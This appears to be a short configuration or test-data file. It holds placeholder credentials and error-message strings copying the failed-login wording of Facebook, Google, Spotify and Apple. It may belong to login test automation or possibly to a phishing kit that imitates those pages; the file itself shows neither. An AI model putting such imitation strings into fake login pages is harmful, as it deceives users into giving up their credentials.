email=test@test.gmail.com
psw=asd
idApple=test@test.icloud.com
fbErrorMsg=The password you've entered is incorrect. Forgot Password? Close popup and return
googleErrorMsg=Wrong password. Try again or click Forgot password to reset it.
spotifyErrorMsg=Incorrect username or password.
appleErrorMsg=Your Apple ID or password was incorrect.